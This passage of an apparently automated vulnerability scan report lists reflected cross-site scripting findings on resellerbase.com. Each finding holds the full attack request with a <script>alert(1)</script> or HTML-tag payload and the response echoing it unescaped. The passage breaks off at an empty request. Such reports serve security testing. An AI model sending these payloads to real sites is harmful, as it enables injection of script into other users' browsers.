2.823. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f84b0<script>alert(1)</script>1d536714c00e7995d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detailf84b0<script>alert(1)</script>1d536714c00e7995d/10/rating.php?id=10&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detailf84b0<script>alert(1)</script>1d536714c00e7995d/10/rating.php?id=10&rating=5 was not found on this server.</p>
...[SNIP]...

2.824. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 2811f<script>alert(1)</script>5adfcbff9e0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail2811f<script>alert(1)</script>5adfcbff9e0/10/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail2811f<script>alert(1)</script>5adfcbff9e0/10/rating.php was not found on this server.</p>
...[SNIP]...

2.825. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a17f8<script>alert(1)</script>4bee95bd065fe8d2c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/10a17f8<script>alert(1)</script>4bee95bd065fe8d2c/rating.php?id=10&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10a17f8<script>alert(1)</script>4bee95bd065fe8d2c/rating.php?id=10&rating=5 was not found on this server.</p>
...[SNIP]...

2.826. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5310<script>alert(1)</script>2a257653b76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10c5310<script>alert(1)</script>2a257653b76/rating.php HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10c5310<script>alert(1)</script>2a257653b76/rating.php was not found on this server.</p>
...[SNIP]...

2.827. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 81ff5<script>alert(1)</script>2ba002b959df8c86d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/10/rating.php81ff5<script>alert(1)</script>2ba002b959df8c86d?id=10&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/rating.php81ff5<script>alert(1)</script>2ba002b959df8c86d?id=10&rating=5 was not found on this server.</p>
...[SNIP]...

2.828. http://www.resellerbase.com/detail/10/rating.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7da50<script>alert(1)</script>154fc29aed0 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/rating.php7da50<script>alert(1)</script>154fc29aed0 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:26:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/rating.php7da50<script>alert(1)</script>154fc29aed0 was not found on this server.</p>
...[SNIP]...

2.829. http://www.resellerbase.com/detail/10/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 9ccb8<script>alert(1)</script>31b9d9a7f1398a48b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Request

GET /detail/10/rating.php/9ccb8<script>alert(1)</script>31b9d9a7f1398a48b?id=10&rating=5 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/rating.php/9ccb8<script>alert(1)</script>31b9d9a7f1398a48b?id=10&rating=5 was not found on this server.</p>
...[SNIP]...

2.830. http://www.resellerbase.com/detail/10/rating.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/rating.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload acdf2<script>alert(1)</script>9bca1a4857e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/rating.php?acdf2<script>alert(1)</script>9bca1a4857e=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:25:50 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/rating.php?acdf2<script>alert(1)</script>9bca1a4857e=1 was not found on this server.</p>
...[SNIP]...

2.831. http://www.resellerbase.com/detail/10/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d53e1<script>alert(1)</script>853346db445 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaild53e1<script>alert(1)</script>853346db445/10/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:14 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaild53e1<script>alert(1)</script>853346db445/10/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.832. http://www.resellerbase.com/detail/10/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4e859<script>alert(1)</script>336be86808e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/104e859<script>alert(1)</script>336be86808e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/104e859<script>alert(1)</script>336be86808e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.833. http://www.resellerbase.com/detail/10/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8e899<script>alert(1)</script>efa70996aa5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/search.php8e899<script>alert(1)</script>efa70996aa5?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:39 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php8e899<script>alert(1)</script>efa70996aa5?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.834. http://www.resellerbase.com/detail/10/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 94fb8<a>fd89e68c8a7 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/search.php?keyword=search...&Submit3=Search94fb8<a>fd89e68c8a7&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:01 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php?keyword=search...&Submit3=Search94fb8<a>fd89e68c8a7&opt=2 was not found on this server.</p>
...[SNIP]...

2.835. http://www.resellerbase.com/detail/10/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 9588a<a>ea239c42dcc was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/search.php?keyword=search...9588a<a>ea239c42dcc&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:02:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php?keyword=search...9588a<a>ea239c42dcc&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.836. http://www.resellerbase.com/detail/10/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 18e41<script>alert(1)</script>31b6763028 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/search.php?keyword=search...&Submit3=Search&opt=2&18e41<script>alert(1)</script>31b6763028=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php?keyword=search...&Submit3=Search&opt=2&18e41<script>alert(1)</script>31b6763028=1 was not found on this server.</p>
...[SNIP]...

2.837. http://www.resellerbase.com/detail/10/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 3a8a5<a>3665cf3a6cb was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/10/search.php?keyword=search...&Submit3=Search&opt=23a8a5<a>3665cf3a6cb HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/10/telebay-com.html
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/search.php?keyword=search...&Submit3=Search&opt=23a8a5<a>3665cf3a6cb was not found on this server.</p>
...[SNIP]...

2.838. http://www.resellerbase.com/detail/10/telebay-com.html [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/telebay-com.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 1fe46<script>alert(1)</script>84450f56124 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail1fe46<script>alert(1)</script>84450f56124/10/telebay-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail1fe46<script>alert(1)</script>84450f56124/10/telebay-com.html was not found on this server.</p>
...[SNIP]...

2.839. http://www.resellerbase.com/detail/10/telebay-com.html [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/10/telebay-com.html

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 4ec2a<a>102051a593a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/104ec2a<a>102051a593a/telebay-com.html HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:24:42 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/104ec2a<a>102051a593a/telebay-com.html was not found on this server.</p>
...[SNIP]...

2.840. http://www.resellerbase.com/detail/10/telebay-com.html [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/telebay-com.html

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d7fa2<script>alert(1)</script>713c15e9369 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/10/d7fa2<script>alert(1)</script>713c15e9369 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; CloudScan Vuln Crawler http://cloudscan.me)
Connection: close
Cookie: PHPSESSID=3d2d0fc94e09db93396d3f0c490a8dd4;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 21:25:37 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/10/d7fa2<script>alert(1)</script>713c15e9369 was not found on this server.</p>
...[SNIP]...

2.841. http://www.resellerbase.com/detail/10/themes/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 60eff<script>alert(1)</script>8499bc1d663 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail60eff<script>alert(1)</script>8499bc1d663/10/themes/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:03:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail60eff<script>alert(1)</script>8499bc1d663/10/themes/ was not found on this server.</p>
...[SNIP]...

2.842. http://www.resellerbase.com/detail/10/themes/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/10/themes/

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 444fb<script>alert(1)</script>1e7ba32b487 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

